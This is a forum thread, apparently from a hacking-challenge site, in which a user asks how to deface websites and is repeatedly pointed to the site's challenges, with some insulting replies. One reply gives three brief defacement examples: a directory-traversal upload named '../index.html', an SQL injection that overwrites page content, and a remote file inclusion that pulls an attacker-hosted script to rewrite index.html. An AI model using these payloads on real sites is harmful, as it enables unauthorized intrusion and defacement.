About defacing websites

First of all: I do not intend to compromise the security of any website. I am trying to learn for educational purposes only.

Is it common with web defacements? I mean like the index page has been replaced or edited. Which methods are used nowadays? I've read that people used to hack IIS, but I think that's outdated… I'm not sure, tho. Lets say that I install a web server on one computer. What tools should i use to deface it remotely?

Again: I just want to learn the methods :)

icecground wrote: First of all: I do not intend to compromise the security of any website. I am trying to learn for educational purposes only.

Is it common with web defacements? I mean like the index page has been replaced or edited.

Is what common? I'm not sure what you're asking here.

Which methods are used nowadays? I've read that people used to hack IIS, but I think that's outdated… I'm not sure, tho.

People still target IIS. IIS is Microsoft's web server software. More commonly Apache is used, however.

Lets say that I install a web server on one computer. What tools should i use to deface it remotely?

Hacking is not (and should not be) a "use tool on webserver and get root" activity. You need to learn how the exploits work and how to do them.

Again: I just want to learn the methods :)

"Learning the methods" is not something we can just tell you over a single forum post. This entire website is dedicated to learning to hack, it takes time to figure it out, not just a single day of leisure reading. I don't think you understand what you're asking.

Well… I'd like to learn how to find the exploits, then.

icecground wrote: Well… I'd like to learn how to find the exploits, then.

Again: Start with the challenges on this site. It's not something we can just "tell" you how to do like you are expecting us to. You have to put dedication and hard work into it. Learn a few programming languages, do all the challenges on this site, put years of work into it, then maybe you'll have something. It's no small accomplishment to be able to hack.

I'm not sure what sort of answer you are expecting from us, but we can't just be like "Yeah, you hack any website like this: ".

Well, it's just that I know some programming and such, and now I want to learn web defacement and server hacking. I know it will be hard, but I want to know where I can start, and how I do it =)

Start with the challenges on this site. If you really want, it's also very helpful to create your own webserver on your local machine and create exploits and learn how they work internally.

Thanks for your support, but I'm still not really getting how I'm supposed to learn how to find the exploits. I've built some scripts in PHP on localhost, and tried SQL injection. But I want to learn server defacements. I thank you so much for your time and hope my questions aren't too dumb =D

icecground wrote: Thanks for your support, but I'm still not really getting how I'm supposed to learn how to find the exploits.

You learn to find the exploits by understanding how they work.

I've built some scripts in PHP on localhost, and tried SQL injection. But I want to learn server defacements.

The 'server defacements' you are talking about is just using the exploit to gain privileged that allow you to overwrite files on the webserver with your own files. You have to gain access first.

Well in order to test the exploits i must now what to do, aint that so? I can't do a SQL injection without knowing what to write. And could you give an example on how to overwrite a file? Just so I can understand

http://en.wikipedia.org/wiki/SQL_injection

I would venture to guess you have used google to aquire information you seek - if not, its a good place to start for learning, howtos, tutorials etc…. and for hands on try all the challenges relating to what you want to learn.

Good luck!

Well yes. But I allready know SQL injections, kinda. And if I want more information in how to do SQL injections I'll google it. But as previously written I want to replace a page on a web server with some method. And I'm looking for documentation/tutorials on how to do this.

icecground wrote: Well yes. But I allready know SQL injections, kinda. And if I want more information in how to do SQL injections I'll google it. But as previously written I want to replace a page on a web server with some method. And I'm looking for documentation/tutorials on how to do this.

Here are some examples:

1. The site in question has an upload forum. Upload a file and save it with the name "../index.html". That moves up a directory and will write to index.html with the file. That's called directory traversal

2. Say the site uses Mysql and you figure out how to execute any SQL commands you would like via an injection. Knowing the database structure, you could write a command like: "'; UPDATE pages SET content = "Hacked by Stealth-!" WHERE page = index.php". That's SQL injection.

3. You manage to get a RFI. The site has PHP script like: "page.php?get=index.php". You can include a PHP document like this: "page.php?get=http://yoursite.com/evilscript.php". Then evilscript.php can be a PHP script which fopen's index.html for writing and writes "Hacked by Stealth-!" to it. That's remote file inclusion.

There are a plethora of ways to do it. The above examples are very simple and probably not going to work with admin's who have any sense, but there are sites that are that insecure. The challenges here cover things exactly like the ones above. I'm getting seriously tired of spoon feeding you here.

Get the fuck out of here you bloody idiot.

If you still have these questions after beating all the challenges your member page says, you are exactly what spyware called you. My guess is you cheated or just found spoilers.

I've beaten them myself, thank you very much. And I thank stealth- for the info, although since I've beaten the missions I know about the different ways, but just not seen defaceing that way. Well, since I can't post here because I get flamed by people who probably doesn't have enough social skills to participate in a discussion, I'll stop writing here.

icecground wrote: I've beaten them myself, thank you very much. And I thank stealth- for the info, although since I've beaten the missions I know about the different ways, but just not seen defaceing that way. Well, since I can't post here because I get flamed by people who probably doesn't have enough social skills to participate in a discussion, I'll stop writing here.

Stupid questions beget stupid answers. If you really want to learn something about security, install *nix, learn some C, Perl, and learn how computers handle memory (ie. read Smashing the Stack for Fun and Profit a few times).

Report back when you've got that down, I guess?

icecground wrote: I'll stop writing here.

Good idea.